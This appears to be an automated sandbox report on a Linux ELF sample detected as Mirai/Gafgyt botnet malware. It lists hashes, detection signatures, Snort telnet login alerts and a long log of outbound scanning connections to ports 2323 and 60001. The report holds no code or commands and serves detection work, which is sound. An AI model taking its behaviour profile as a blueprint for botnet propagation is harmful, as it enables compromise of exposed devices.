Linux Analysis Report 01oHMcUgUM

Overview

General Information

Sample Name: 01oHMcUgUM
Analysis ID: 553470
MD5: 14c3173a21e8dd262999e2ab8c2833f4
SHA1: efc2c18ac9a0f9dab71930037496cc676fa18bea
SHA256: dec1840b49d9d7303369f1ce3efec379e86bd7095a4a2630b2c3df18ab1a12f4
Tags: 32elfmirairenesas
Infos:

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample has stripped symbol table
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 01oHMcUgUM Virustotal: Detection: 54% Perma Link
Source: 01oHMcUgUM ReversingLabs: Detection: 62%

Bitcoin Miner:

barindex
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5372) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5494) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5635) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5675) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5747) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5857) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5900) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5974) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35426 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36624 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36626 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36628 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36630 version: TLS 1.2

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37834
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37834
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37864
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37864
Source: Traffic Snort IDS: 716 INFO TELNET access 172.108.130.73:23 -> 192.168.2.23:48104
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 172.108.130.73:23 -> 192.168.2.23:48104
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 172.108.130.73:23 -> 192.168.2.23:48104
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37944
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37944
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37978
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37978
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37994
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37994
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:38018
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:38018
Source: Traffic Snort IDS: 716 INFO TELNET access 172.108.130.73:23 -> 192.168.2.23:48172
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 172.108.130.73:23 -> 192.168.2.23:48172
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 172.108.130.73:23 -> 192.168.2.23:48172
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:38028
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:38028
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 39118 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 39118
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55462
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55464
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55466
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55468
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55470
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55472
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55474
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55476
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55478
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55480
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40918 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 40918
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 45494 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57730 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33204 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 57730
Source: unknown Network traffic detected: HTTP traffic on port 42450 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 42450
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 4.81.245.225:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 135.179.24.145:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 12.164.223.77:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 70.230.240.106:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 67.107.242.196:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 118.97.127.126:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 87.219.161.126:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 168.141.187.3:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 77.233.127.171:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 101.238.32.150:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 87.104.37.64:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 152.70.75.142:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 189.119.225.36:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 162.168.116.77:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 167.158.201.193:2323
Source: global traffic TCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 12.89.245.225:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 82.44.132.225:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 72.103.164.178:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 40.182.127.34:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 35.248.165.235:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 150.13.1.25:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 57.119.217.0:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 68.99.76.102:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 54.231.244.126:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 105.130.162.201:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 23.10.151.63:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 54.102.132.25:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 217.223.74.240:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 119.26.172.232:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 76.8.19.26:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 182.70.68.229:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 165.95.82.184:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 98.19.65.66:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 13.109.199.98:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 99.79.178.55:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 198.56.223.131:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 49.153.182.162:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 146.19.19.135:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 4.184.156.91:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 125.2.59.41:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 190.212.48.173:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 76.0.6.92:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 191.203.42.55:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 144.128.245.105:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 169.114.50.107:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 67.33.44.116:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 37.116.77.81:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 148.221.143.15:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 92.49.60.181:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 58.47.253.78:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 218.248.49.236:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 90.214.131.124:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 123.186.164.0:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 173.3.179.96:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 4.193.182.190:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 9.214.185.128:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 181.13.44.188:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 12.227.218.51:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 140.123.87.210:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 179.151.104.98:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 51.179.16.29:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 60.56.176.50:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 177.53.179.180:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 20.84.45.177:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 103.240.192.206:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 155.191.77.101:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 164.100.18.225:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 212.43.106.175:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 70.87.99.42:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 162.6.13.232:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 83.62.154.96:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 32.161.148.115:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 109.157.103.213:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 50.157.51.33:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 137.107.0.142:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 41.178.130.167:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 136.180.125.165:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 52.229.47.236:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 103.204.116.94:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 39.174.167.62:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 158.185.49.72:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 90.38.62.92:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 4.70.196.240:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 119.144.121.239:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 50.246.243.60:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 35.27.250.95:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 165.102.237.120:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 118.224.164.209:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 82.145.81.197:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 158.117.186.183:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 223.54.66.43:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 173.196.91.115:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 167.108.56.24:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 132.2.37.169:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 54.76.171.86:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 181.119.27.154:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 107.215.152.203:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 218.39.243.167:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 91.218.156.145:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 169.106.72.166:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 75.154.22.72:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 17.186.150.92:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 37.23.55.209:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 182.54.159.173:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 157.188.146.202:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 140.126.199.86:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 114.156.97.161:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 171.22.141.109:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 94.146.116.224:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 105.101.3.40:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 198.172.211.243:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 149.250.142.186:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 187.20.10.151:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 54.218.173.38:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 190.248.226.39:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 205.119.143.149:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 122.27.230.255:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 85.13.225.242:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 136.207.254.217:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 1.140.29.55:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 14.105.184.129:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 124.234.204.62:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 125.161.193.233:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 113.114.44.150:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 39.166.230.150:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 165.141.50.205:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 121.98.44.96:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 183.91.217.243:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 169.101.254.28:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 135.93.19.149:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 24.162.139.147:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 82.17.172.45:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 137.179.194.247:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 199.117.11.125:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 165.185.194.61:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 148.77.54.158:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 88.143.80.162:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 24.126.223.106:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 77.242.200.213:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 78.196.10.204:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 128.13.184.248:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 171.218.127.191:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 194.216.18.10:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 97.40.133.27:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 114.182.29.87:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 111.67.188.235:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 67.201.194.119:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 132.206.167.162:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 169.149.149.238:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 82.220.136.223:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 4.220.193.193:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 195.238.168.31:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 161.16.208.101:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 54.145.98.151:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 174.171.174.85:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 88.109.206.94:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 205.238.176.178:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 38.105.48.105:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 206.154.151.147:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 126.111.38.39:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 111.160.78.41:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 208.8.77.133:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 159.159.243.17:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 183.142.11.246:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 156.42.162.78:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 107.158.53.184:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 39.236.109.179:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 152.36.14.122:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 99.227.152.118:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 122.238.8.209:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 203.124.158.18:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 156.204.198.37:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 147.66.174.60:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 175.175.177.60:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 90.60.149.132:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 189.170.165.16:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 141.114.246.52:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 101.53.128.241:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 180.133.27.54:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 93.81.91.14:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 204.197.95.52:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 180.37.15.234:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 124.36.207.25:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 191.76.175.71:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 166.28.239.217:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 119.177.155.178:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 77.35.38.223:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 203.64.245.173:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 49.208.13.133:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 32.1.47.24:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 65.49.211.164:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 204.57.117.80:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 161.198.185.223:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 176.217.26.186:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 34.94.4.165:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 1.57.11.162:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 168.243.204.61:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 72.173.213.204:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 188.8.125.26:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 117.111.137.251:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 144.208.84.102:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 190.239.120.26:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 114.130.215.40:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 166.56.77.128:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 39.152.104.0:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 203.165.191.153:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 183.168.233.137:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 223.161.7.6:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 114.252.52.59:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 163.194.98.72:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 19.113.99.210:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 18.19.244.36:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 140.151.47.182:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 141.155.190.93:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 81.72.15.235:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 176.63.190.64:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 204.4.242.5:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 159.94.98.86:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 128.145.62.55:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 85.132.243.39:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 61.45.12.175:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 199.199.253.100:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 25.169.94.68:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 213.157.15.243:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 156.177.150.164:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 44.109.231.93:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 103.80.146.238:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 68.24.233.252:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 25.138.235.26:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 131.130.149.154:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 38.200.213.40:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 89.163.249.195:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 61.51.115.20:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 173.124.36.7:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 201.248.167.246:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 131.11.27.230:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 82.245.182.12:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 43.239.0.245:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 216.5.123.211:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 139.47.105.252:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 165.97.106.106:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 220.94.102.135:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 184.192.57.43:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 103.26.78.126:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 153.17.190.40:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 86.189.78.147:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 148.128.147.110:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 12.208.183.15:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 121.85.105.239:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 50.3.81.115:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 195.67.19.122:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 81.254.183.17:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 24.144.22.53:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 206.181.99.110:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 71.185.42.28:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 179.41.155.0:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 41.75.109.117:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 133.188.133.195:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 206.129.231.122:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 216.98.48.225:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 88.153.80.73:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 205.144.54.102:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 37.158.229.235:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 185.209.13.180:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 126.161.7.90:60001
